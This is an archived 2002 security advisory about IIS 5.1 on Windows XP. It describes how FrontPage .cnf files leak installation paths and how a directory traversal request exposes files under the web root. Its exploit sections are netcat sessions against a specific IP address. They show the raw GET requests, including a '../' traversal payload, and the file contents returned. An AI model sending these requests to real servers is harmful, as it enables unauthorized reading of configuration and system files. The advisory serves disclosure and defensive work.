Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: IIS :: web5092.htm

IIS path & directory traversal issues



12th Feb 2002 [SBWID-5092]
COMMAND

	IIS path & directory traversal issues

SYSTEMS AFFECTED

	Windows XP with IIS 5.1

PROBLEM

	In NtWaK0 [http://www.SafeHack.com] advisory :
	

	Identify   WEB    DIR    installation.    By    sending    this    \"GET
	/_vti_pvt/access.cnf\" you can identify the web installation. As we  all
	know this is a helpfull peace of information  if  someone  is  going  to
	attack your web site. Multiple .cnf are at cause.
	

	Exploits : ========
	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/access.cnf

	vti_encodingSR|utf8-nl

	RealmNameLAMER

	InheritPermissionsfalse

	PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt

	

	Their    is    another     security     issue     with     this     too.
	\"InheritPermissionsfalse\" This will tell security inheritance of  that
	folder.
	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/botinfs.cnf

	vti_encodingSR|utf8-nl

	D\\\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\Web Server Extensions\\\\

	40\\\\bots\\\\vinavbar\\\\vinavbar.infVW|vinavbar

	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/bots.cnf

	vti_encodingSR|utf8-nl

	vinavbarVW|D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft\\\\ Shared

	\\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar\\\\\\\\vinavbar.inf

	vinavbar E I info N D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft

	\\\\ Shared\\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar

	\\\\\\\\fp4Avnb.dll

	

	

	-Also-
	

	

	Using GET /iishelp/common/colegal.htm you can access other files.  under
	the web structure. I did not have chance to test it on  file  above  the
	web structure. Like I said I do not run IIS 5.1 but a friend  does.  One
	of these days I am  going to buy more memory for some of my old box and
	

	 Exploits :

	 ========

	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /iishelp/common/colegal.htm../../../../../_vti_pvt/access.cnf

	vti_encodingSR|utf8-nl

	RealmNameLAMER

	InheritPermissionsfalse

	PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt

	writeto.cnf [Extracted From]

	http//www.microsoft.com/technet/treeview/default.asp?url=/TechNet/

	prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp

	

	Back links for files that can be written to by users of  the  web,  such
	as Save Results Form handler result files. Files that can be written  to
	by users of the web have a looser  security  setting  than  regular  web
	content.
	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /iishelp/common/colegal.htm../../../../../_vti_bin/_vti_adm/admin.dll

	MZ ?   ? + @a   ???   -!+?L-!This program cannot be run in DOS mode.

	$ -Q+Q?Q?Q?3,U?寮5T?Q>F?T9P?寮4S?寮;U?RichQ?

	PE  L??         _; a ?!???  ?   0      c?   ?        g ?   ?  ?       ?

	        P   ?  -  ?     ?  ?    ?  ?      ?    ?     (?  P    0  P?

	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/linkinfo.cnf

	vti_encodingSR|utf8-nl

	javascript\\loadhelpfront();localstart.asp

	javascript\\activate(<%=iver%>);localstart.asp

	http\\//www.safehack.comindex.htm

	/iishelp/common/colegal.htmlocalstart.asp

	

SOLUTION

	None yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH